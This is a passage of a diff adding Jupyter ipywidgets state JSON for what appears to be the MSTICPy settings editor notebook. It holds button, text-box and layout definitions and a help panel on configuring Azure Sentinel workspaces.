+       "style": "IPY_MODEL_5a31812c6a7b4a3cb90f651ff8a60a56"
+      }
+     },
+     "38e46ce27b2145a6bf0fc2f37e0b244f": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Search",
+       "layout": "IPY_MODEL_a1d90c130a7b413bbe99fe78e62f1903",
+       "style": "IPY_MODEL_074322927b0348739193e78d63b7e5d8"
+      }
+     },
+     "391f5063ce604e8480c34f51bb0ffaa6": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "3940ed4c79244364ab8c161cb313ca74": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "3a3f76b7cffe458ebd9370b00bed1dc5": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "3a526064e44041aaac5a083d9d90ed67": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "3ac23f8c040d4a438799acb9617b4c39": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "3ada0cbd4e034ea382eaf0aef06aba0c": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextModel",
+      "state": {
+       "description": "DBFolder",
+       "layout": "IPY_MODEL_ea7f96341540490a99ad5d1794972619",
+       "style": "IPY_MODEL_d653404232ee4ed38dc9b2ea2e0f3d3b",
+       "value": "\"~/.msticpy\""
+      }
+     },
+     "3b3327f5f4b44792a7aa6729d84eb300": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "3b50ed86ea4547569a90ad8d03902665": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "3b5d13442c114d76832700a98fd10156": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_403d0ba13a354d9789222484693c8747",
+        "IPY_MODEL_1ba30e65beee44698a1eb5821e5ecd63",
+        "IPY_MODEL_30751b67b634429593b9a2c17e41f331"
+       ],
+       "layout": "IPY_MODEL_3a526064e44041aaac5a083d9d90ed67"
+      }
+     },
+     "3b6bcc00b5ec4f0c9de3dfc8fe2b55b3": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HTMLModel",
+      "state": {
+       "layout": "IPY_MODEL_07fce4095bfe43079b1a1da59043282c",
+       "style": "IPY_MODEL_6d7fccedc45e46e1bd6ce182446b31b0",
+       "value": "<h3>MSTICPy settings</h3>"
+      }
+     },
+     "3bc91074a5ba4e8eac1f33fb8b5152f9": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "3cae9c1da47e4818aa5c64d445f6c11d": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "CheckboxModel",
+      "state": {
+       "description": "Def KV Path",
+       "disabled": false,
+       "layout": "IPY_MODEL_445b695a25304ea9a1907e9da2e456dd",
+       "style": "IPY_MODEL_920a78a50b95471db6c7a831cb064cc7",
+       "value": true
+      }
+     },
+     "3ce4acbe42534fad923e52eed32715ff": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "SelectModel",
+      "state": {
+       "_options_labels": [
+        "GeoIPLite",
+        "IPStack"
+       ],
+       "description": "Providers",
+       "index": 0,
+       "layout": "IPY_MODEL_535aa7be330448fca1e52a4a09538928",
+       "style": "IPY_MODEL_fd7b950590534dba9ff47b394d3b0cf7"
+      }
+     },
+     "3e3702c8b23043038794b24215309935": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "3e3ef467f4854cecb279674433629250": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "3ea8c40fef054f1da41e3bd4613334e2": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "3efd692b66f348a681423128f702e850": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextModel",
+      "state": {
+       "description": "Provider",
+       "disabled": true,
+       "layout": "IPY_MODEL_ea7f96341540490a99ad5d1794972619",
+       "style": "IPY_MODEL_4db360cc2d984dabb088da45c985aae4",
+       "value": "GeoLiteLookup"
+      }
+     },
+     "4029a96e69bd4efd9968bd06e143f129": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "403d0ba13a354d9789222484693c8747": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "LabelModel",
+      "state": {
+       "layout": "IPY_MODEL_590977c42d7142ab96bfee4f0e2b97c3",
+       "style": "IPY_MODEL_e99cc9e5085e4166a732d355d9f1d7c0",
+       "value": "Search for file in current path"
+      }
+     },
+     "40cec93fb0ec431db558e192ddec9f15": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_e8e2b3ae6b4544c08f465707c4d0dd3d",
+        "IPY_MODEL_95adc86cdebf4984a7e9c6d1366f4404"
+       ],
+       "layout": "IPY_MODEL_720106934cc440649b7e242c97cebde7"
+      }
+     },
+     "420dc74dbcae43908eb5ddcaefb97b17": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "425527b6ce074d4e96121ca747e51a95": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_131a8d834df34ffc95a8ba0d3160c603",
+        "IPY_MODEL_ebe47278b7914c74a3870ab79f18b39e",
+        "IPY_MODEL_6eb28a00d025431fb8668f2dddbeb025"
+       ],
+       "layout": "IPY_MODEL_9eaba2d1322143f0b1a7ae84bff066d4"
+      }
+     },
+     "42cdaf287d4f49babd978cd3293a0689": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "100px"
+      }
+     },
+     "42e254491c0f43668cd2d2ce1ab0f967": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "border": "solid gray 1px",
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "99%"
+      }
+     },
+     "431f387beeb34628a27107bd1b649505": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "30%"
+      }
+     },
+     "4397f924dea5447db13eb2fec419aa50": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "AccordionModel",
+      "state": {
+       "_titles": {
+        "0": "Help"
+       },
+       "children": [
+        "IPY_MODEL_73c1db82519a406e818d97cffe1b67fc"
+       ],
+       "layout": "IPY_MODEL_7a0e5c25fa80447c9908e3639e84550e",
+       "selected_index": null
+      }
+     },
+     "43dec354419244b7bfccf4eabcd1f4d9": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "99%"
+      }
+     },
+     "43df6fca430a47789958843a70dc94df": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_bc808a3916ee49b395f94ac8ef7f614b",
+        "IPY_MODEL_9000ccd4b8c543b19e650cae0e47f78c",
+        "IPY_MODEL_f3b2451c012c4cd98d8494d0c9f14ef7"
+       ],
+       "layout": "IPY_MODEL_4029a96e69bd4efd9968bd06e143f129"
+      }
+     },
+     "445b695a25304ea9a1907e9da2e456dd": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "visibility": "visible"
+      }
+     },
+     "44877abce781493e8c8d4cd4a96ddbf5": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "150px"
+      }
+     },
+     "44d1b7af5ce94561903fb816a5582cfb": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "44e87fe553044e4cba878c05ee113fc7": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextModel",
+      "state": {
+       "continuous_update": false,
+       "description": "Search pattern",
+       "layout": "IPY_MODEL_efb1a55ac5b04399af17857941106168",
+       "style": "IPY_MODEL_edb2671ff424439f81a37a23b88ad403"
+      }
+     },
+     "44fad815235f47c1bea6542968f88c70": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextModel",
+      "state": {
+       "description": "Current file",
+       "layout": "IPY_MODEL_2b8456d0ff9245619e0c5c41e337264e",
+       "style": "IPY_MODEL_ab41b236f208450695ed6cebd9603777"
+      }
+     },
+     "4575b35b46ca4bcdad5f20b4b8187ffc": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "64%"
+      }
+     },
+     "457c2b4d42974669b4dda31f7a4a79e3": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "45a5f71d72dd42baa25cb51ac888ba3e": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextModel",
+      "state": {
+       "description": "Value of MSTICPCONFIG",
+       "disabled": true,
+       "layout": "IPY_MODEL_2b8456d0ff9245619e0c5c41e337264e",
+       "style": "IPY_MODEL_cddd3304f9ab49b58af08252ffc39c0b",
+       "value": "e:\\src\\microsoft\\msticpyconfig.yaml"
+      }
+     },
+     "45c7d7bdb5e2421b90fed5d24b663b2d": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "46170d4f86244b4190a759daa1231f10": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_ed08345a28fa48f5a3a91147920f72c9"
+       ],
+       "layout": "IPY_MODEL_528cbfdb0f3746599cf011502fdf4b29"
+      }
+     },
+     "4698673c4710455ea3d8e9924833c03a": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_0aef220e3d5745e18034edfcc306003a",
+        "IPY_MODEL_33619eb5814343c894c1ed2b209b8cde"
+       ],
+       "layout": "IPY_MODEL_e8eefdbb4e6e4e36aa87e19404b998c8"
+      }
+     },
+     "47b5829b00554d7091d2208977712a50": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Save File",
+       "layout": "IPY_MODEL_e52c8bd4809e41a0a4c874697ad1cc38",
+       "style": "IPY_MODEL_b56ea10a7a40481298ebdf0dbe81eb2c"
+      }
+     },
+     "47bbe69896e64ab0b8d78548abc32217": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "border": "solid gray 1px",
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "39%"
+      }
+     },
+     "484dc9e72b434aab9decc0eb6ccc99ec": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "70px"
+      }
+     },
+     "48d0f3eae20847e1bf950bdb53fe78b0": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "70px"
+      }
+     },
+     "494be31585354bd6b62b73c7e92b41cf": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "border": "solid gray 1px",
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "99%"
+      }
+     },
+     "4b51cc653b41414a89fa6c47e9d42cfc": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_e2f584e1d5aa45e1bf3c9a23de14b6a6",
+        "IPY_MODEL_a1a2cebda85c4656a3c6387c9daef09f",
+        "IPY_MODEL_c86c3e7bc5e84a048f595ac44a26a507",
+        "IPY_MODEL_7b4fd7bba6f84d209c2f764123cfa4b7",
+        "IPY_MODEL_26bb903822cb4a1e9dedf47af70ff683"
+       ],
+       "layout": "IPY_MODEL_a31f73b327254b7c813cc86b313c6b3d"
+      }
+     },
+     "4b872f5468a04761a444205a05d90821": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "4b8b4fd76b034472a433d14c85579aec": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "4bd3cdf4619f4e559b1a2e599956abf3": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "150px"
+      }
+     },
+     "4be543ec69a741ca9ebc9f2b70b7ac2b": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "RadioButtonsModel",
+      "state": {
+       "_options_labels": [
+        "Text",
+        "EnvironmentVar",
+        "KeyVault"
+       ],
+       "description": "Storage:",
+       "index": 2,
+       "layout": "IPY_MODEL_c54b4bbacd7f42acb58423f0504c5366",
+       "style": "IPY_MODEL_da611108f44946e1a1273035e66fd31a"
+      }
+     },
+     "4c097fcbd50a4a388c70bc5855a23ddc": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "4c7991a6833c46288a4ae5d2f3be6c0d": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "4c96f31d9cf2403e857982b6a1b1bdb3": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "4ca255ed7c424985b6c5a092d36b8d7b": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_5ca6857a0a9a4df197de7e29ffcf2d2c",
+        "IPY_MODEL_562192e69954470cb98543216489a4af",
+        "IPY_MODEL_d9bd349c501e46e4ae1576492312185c"
+       ],
+       "layout": "IPY_MODEL_f786dd070bc4492b8cd3bc422d8797b7"
+      }
+     },
+     "4db360cc2d984dabb088da45c985aae4": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "100px"
+      }
+     },
+     "4e06a170f46d449ba69a209c80724ec3": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "4ed07a4cc89d48baadedc2b989e8eb0b": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "4ef60145dd30491383e57f9c3782f3a1": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "View Settings",
+       "layout": "IPY_MODEL_fe7906d23c6047e8bad2542ae8dbe0f0",
+       "style": "IPY_MODEL_d1d9b25888dd4be78a4e89cea603fbf0"
+      }
+     },
+     "4f0605db3a1844e08977801bf5f28889": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Save",
+       "layout": "IPY_MODEL_6ea20439d77e4e6199861f8ec14ede0c",
+       "style": "IPY_MODEL_16ea839dfe5d4012be49b1904e01da03"
+      }
+     },
+     "5017666d1e234ea385dd9802033cdeb5": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "100px"
+      }
+     },
+     "503cd98bfdb84aebac72f3ec659235d9": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Reload settings",
+       "layout": "IPY_MODEL_7b32d76ea7a9413b84f9f8813692cf0e",
+       "style": "IPY_MODEL_25bd3398e1ea4104aa33cc2de08e2a23"
+      }
+     },
+     "50d0674861f24a309ca322b43bb6b20f": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HTMLModel",
+      "state": {
+       "layout": "IPY_MODEL_2e7bbe9ec04a44ec95c886a37abbad54",
+       "style": "IPY_MODEL_0c5275a51e584d889e03e632b2b8dc6e",
+       "value": "<h3>MSTICPy settings</h3>"
+      }
+     },
+     "50ea233d5841471a93ccb7be5837e125": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "SelectModel",
+      "state": {
+       "_options_labels": [
+        "..",
+        ".ipynb_checkpoints",
+        "Kqlmagic_temp_files",
+        "__pycache__",
+        "data",
+        "kqlmagic"
+       ],
+       "description": "Folders",
+       "index": 0,
+       "layout": "IPY_MODEL_7efd206c0cdd4234b726066fb3aa3256",
+       "style": "IPY_MODEL_61d4629b24ea4bea8eaff7493f8278e2"
+      }
+     },
+     "5113197caf3742a4afc2777e44424a5f": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_7d7a5baafeeb4d1e9de080deb7c9d6e2",
+        "IPY_MODEL_36bb561ad3b643f68b4912a64143adf1"
+       ],
+       "layout": "IPY_MODEL_742edb1b5fa245e0b3fbe8b817c55708"
+      }
+     },
+     "528cbfdb0f3746599cf011502fdf4b29": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "border": "solid gray 1px",
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "99%"
+      }
+     },
+     "52dc0cd425cf407eb7f1928ee8fb4d93": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextModel",
+      "state": {
+       "description": "SubscriptionId",
+       "layout": "IPY_MODEL_307293a98db44c97848b363bc6f39f99",
+       "style": "IPY_MODEL_8427f84db4cc4966994dda4d46c93339",
+       "value": "40dcc8bf-0478-4f3b-b275-ed0a94f2c013"
+      }
+     },
+     "52eddaf23b26471ebe2e1a1708f68d1e": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "535aa7be330448fca1e52a4a09538928": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "height": "150px",
+       "width": "300px"
+      }
+     },
+     "53e02b3c905d4a8d8aa142cfe5e0e91c": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Convert to MP",
+       "layout": "IPY_MODEL_fe7906d23c6047e8bad2542ae8dbe0f0",
+       "style": "IPY_MODEL_c1e16a6be6c14fa3bc4b9fbfb2aee6c4"
+      }
+     },
+     "543250bf8399477d87a9d0ede9948da7": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "5589d6685a434327a25e1420cd29928c": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "visibility": "visible"
+      }
+     },
+     "559d8120a8cd4e788165028f03e3f44b": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_2b087e1d24ed43de8c70e2a5274b21ec",
+        "IPY_MODEL_f23bc02d9fdb49aca1fb2cd9b09c1383"
+       ],
+       "layout": "IPY_MODEL_b920c2d4fc7d418289beea3b23173e6b"
+      }
+     },
+     "562192e69954470cb98543216489a4af": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Delete",
+       "layout": "IPY_MODEL_e531be2f1ccc4dc2ac27761f34ccb3a6",
+       "style": "IPY_MODEL_8aa14326a0884fa38590629c3da4bd38"
+      }
+     },
+     "564557756c2e4f83a404447a72707f6d": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "75%"
+      }
+     },
+     "56ba0f5b3a534318a55de2170f3c259c": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_ef662708cb7443749144dc336632be9e",
+        "IPY_MODEL_d00aec55e8ab48bcbbf5148e6bf9c4ea"
+       ],
+       "layout": "IPY_MODEL_a09b45f3b4fc48feaec012d592546497"
+      }
+     },
+     "56cafbb94d3a463293bebc18cc1414c7": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_bee18ca76800436ab6eefe00a03164db",
+        "IPY_MODEL_a11e6eba4e484ea6b7c910ae17b9e0d8"
+       ],
+       "layout": "IPY_MODEL_212641af08d2481f9ca8ab839126fb88"
+      }
+     },
+     "56f0e9d4b62d42dcb2e9c699cb332521": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_db2ef4286e7d40439a69a6220f3b9513",
+        "IPY_MODEL_56ba0f5b3a534318a55de2170f3c259c",
+        "IPY_MODEL_fb8e12ad379a47b697b74411d93f862b"
+       ],
+       "layout": "IPY_MODEL_10802d483d6b40c4a4eb54fe278d6f84"
+      }
+     },
+     "570c99ee69554277b2e2742d15a59340": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "577051e663a046f0a4c471aec5be2e85": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Save file",
+       "layout": "IPY_MODEL_fe7906d23c6047e8bad2542ae8dbe0f0",
+       "style": "IPY_MODEL_45c7d7bdb5e2421b90fed5d24b663b2d"
+      }
+     },
+     "57fba514a278440cbe2cd8df35c9c738": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_3ce4acbe42534fad923e52eed32715ff",
+        "IPY_MODEL_b5c8ae06e9034d888d7f85ffe8badb8f",
+        "IPY_MODEL_cb986ba4cc594e7aa20472c53e062efe"
+       ],
+       "layout": "IPY_MODEL_31102513d04d46bfb4f8befd49dac4db"
+      }
+     },
+     "582ab6b0293241938a5443ee75b76023": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HTMLModel",
+      "state": {
+       "layout": "IPY_MODEL_a78dfb49f09f44b6b7ac8a1ad0b5eacf",
+       "style": "IPY_MODEL_a929c446e1df4a24a83144720bb1bbd7",
+       "value": "\n    Supply the parameters for your Azure Sentinel workspaces here.<br>\n\n    You can get all of these (apart from 'TenantID') from your workspace portal.\n    Navigate to \"Settings\" (on the left side of the screen), then click the\n    \"Workspace Settings\" tab near the top of the page.\n\n    The Tenant ID is the only value missing from this settings page. If you cannot\n    find this you can use the following code to try to look it up:\n    <pre>\n    from msticpy.common.config.ce_common import get_def_tenant_id\n    get_def_tenant_id(\"{workspace-subscription-id}\")\n    </pre>\n\n    The name that you use for workspace (the \"Name\" text box) does not have to\n    be the same as the official name. You can use any helpful name that you\n    like. You can even have the same workspace included multiple times with\n    different names.\n\n    There is a special case of the workspace name \"Default\". Normally, when you\n    connect to a workspace you need to supply the name corresponding to the\n    workspace entry in your settings. If you give a workspace the name \"Default\"\n    it will be picked if you do not specify a name. Note, the \"Default\" entry\n    can be a duplicate of another named entry.\n    <br><a href='https://msticpy.readthedocs.io/en/latest/data_acquisition/DataProviders.html#connecting-to-an-azure-sentinel-workspace' target='_blank' style='color: blue; text-decoration: underline;'>Online: Connecting to an Azure Sentinel Workspace</a><br><a href='https://msticpy.readthedocs.io/en/latest/getting_started/SettingsEditor.html#azure-sentinel-workspaces' target='_blank' style='color: blue; text-decoration: underline;'>Online: Help on this tab</a>"
+      }
+     },
+     "58804e7671654b02938d93b7cfd15d05": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "58ede001092d4da3b99c975b3e919572": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_d3bdbda975a44b35ae58d55e23b39abc"
+       ],
+       "layout": "IPY_MODEL_ed785a11425e448eab6b98bb42f39d09"
+      }
+     },
+     "590977c42d7142ab96bfee4f0e2b97c3": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "592a0a7fb23041f2a15b180546beb756": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "99%"
+      }
+     },
+     "5a31812c6a7b4a3cb90f651ff8a60a56": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "5a4ca7cbd81646d1b7c7ae1b8f571dc9": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_bc808a3916ee49b395f94ac8ef7f614b",
+        "IPY_MODEL_2aa8b2f3bf764ce08f0534066d54a2e4",
+        "IPY_MODEL_f3b2451c012c4cd98d8494d0c9f14ef7"
+       ],
+       "layout": "IPY_MODEL_612320cfda6343b1ab69179b6ee8e888"
+      }
+     },
+     "5a689944bbbe4208af0b7258199627d7": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "CheckboxModel",
+      "state": {
+       "description": "Primary",
+       "disabled": false,
+       "layout": "IPY_MODEL_5c4af863563c440091637949f6972cc8",
+       "style": "IPY_MODEL_8eedb2d9012f4e9caf9d389afc3d8bc1",
+       "value": true
+      }
+     },
+     "5bb26128a8b4456daf3c2c4f3942ce84": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_048a2fff59c24ba1894f6d71d8071f65",
+        "IPY_MODEL_f9a76daeec5b460e8594c2ecff0542d1"
+       ],
+       "layout": "IPY_MODEL_0341dddbd6a04b37adf7e26328bc9be4"
+      }
+     },
+     "5c287061e5ff4e5a87002f137433dbff": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "150px"
+      }
+     },
+     "5c3e412c7daa42ea8d55c5d19ad38017": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "40%"
+      }
+     },
+     "5c4af863563c440091637949f6972cc8": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
